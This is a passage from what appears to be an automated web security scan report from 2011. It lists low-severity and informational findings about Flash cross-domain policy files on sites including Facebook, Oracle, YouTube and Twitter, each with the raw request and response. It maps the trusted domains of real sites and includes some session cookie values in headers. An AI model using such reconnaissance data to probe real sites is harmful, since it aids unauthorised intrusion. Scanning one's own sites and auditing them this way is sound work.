Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:42 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:38:44 GMT
Accept-Ranges: bytes
Content-Length: 256
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:57:42 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.csc.com" />
<allow-access-from domain="assets1.csc.com" />
...[SNIP]...

4.117. http://www.deloitte.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deloitte.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sat, 09 Jul 2011 09:03:24 GMT
Accept-Ranges: bytes
ETag: "3d5248f173ecc1:e97"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:56:56 GMT
Content-Length: 195
Connection: close

...<cross-domain-policy>
   <allow-access-from domain="*.deloitte.com" />
   <allow-access-from domain="*.tohmatsu.com" />
   <allow-access-from domain="*.brightcove.com" />
</cross-domain-policy>

4.118. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.80.38
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.119. http://www.fetchback.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- Begin FetchBack Cross Domain Policy Entry -->
<allow-access-from domain="*.fetchback.com" to-ports="80" />
...[SNIP]...

4.120. http://www.marykay.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 142
Content-Type: text/xml
Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT
Accept-Ranges: bytes
ETag: "33c39dfd521cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=964365EE47EE74B09594D9AC3B884E28; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/

<cross-domain-policy>
<allow-access-from domain="*.ai-media.com" />
<allow-access-from domain="*.marykay.com" />
</cross-domain-policy>

4.121. http://www.msnbc.msn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.msnbc.msn.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 3839
Cache-Control: max-age=86
Expires: Tue, 06 Sep 2011 15:07:00 GMT
Date: Tue, 06 Sep 2011 15:05:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.122. http://www.oracle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT
ETag: "969d62-414-4a0c01bd5bd00"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=309450997205923259,0)
Date: Tue, 06 Sep 2011 15:53:59 GMT
Content-Length: 1044
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
...[SNIP]...
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="www.oracleimg.com"/>
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.123. http://www.oracleimg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oracleimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracleimg.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT
ETag: "969d62-414-4a0c01bd5bd00"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=194754870172961622,0)
Date: Tue, 06 Sep 2011 15:54:07 GMT
Content-Length: 1044
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
...[SNIP]...
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.124. http://www.sapient.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sapient.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:27f4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:32 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

4.125. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Tue, 06 Sep 2011 15:34:00 GMT
Expires: Tue, 06 Sep 2011 15:34:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.126. http://www2.znode.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www2.znode.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.znode.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:09 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT
ETag: "e5"
Accept-Ranges: bytes
Content-Length: 229
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
X-Pardot-LB: lb-s2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pardot.com" />
<allow-access-from domain="*.visual.force.com" />
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...

4.127. http://1215.ic-live.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1215.ic-live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1215.ic-live.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 16:45:50 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 17:54:10 GMT
ETag: "1320541-1c8-49eb15936b480"
Accept-Ranges: bytes
Content-Length: 456
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/xml
X-Cache: MISS from i2a-coll-16
X-Cache-Lookup: MISS from i2a-coll-16:80
Via: 1.0 i2a-coll-16:80 (squid/2.6.STABLE21)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="ecdev1.avery.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ecdev1.averysignaturebinders.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.averysignaturebinders.com" secure="false" />
...[SNIP]...

4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin5.testandtarget.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin5.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 17:05:50 GMT
Accept-Ranges: bytes
ETag: W/"313-1313024241000"
Connection: close
Set-Cookie: X-Mapping-obodhgke=640418F0570BDEEB38606A0E869DD5BA; path=/
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

4.129. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:11 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:02:11 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.130. https://docs.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Tue, 06 Sep 2011 22:44:04 GMT
Date: Mon, 05 Sep 2011 22:44:04 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 66149

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.131. http://search.oracle.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.oracle.com

Response

HTTP/1.0 200 OK
ETag: "2916d-103-4d8251fe"
Content-Type: application/xml
Last-Modified: Thu, 17 Mar 2011 18:25:02 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (G;max-age=0+0;age=0;ecid=118531604508,0)
Date: Tue, 06 Sep 2011 15:54:24 GMT
Content-Length: 259
Connection: close
Set-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
...[SNIP]...

4.132. http://sophelle.app5.hubspot.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sophelle.app5.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sophelle.app5.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:111e7"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:27:54 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

4.133. http://sun.edgeboss.net/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sun.edgeboss.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: sun.edgeboss.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "7be11faf85a93e167b2214a018411ba6:1237306055"
Last-Modified: Tue, 17 Mar 2009 16:07:35 GMT
Accept-Ranges: bytes
Content-Length: 384
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:13:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="optimizeyourit.com" />
   <allow-access-from domain="optimiseyourit.com" />
   <allow-access-from domain="www.optimizeyourit.com" />
   <allow-access-from domain="www.optimiseyourit.com" />
...[SNIP]...

4.134. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:02:47 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.135. http://www.covergirl.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

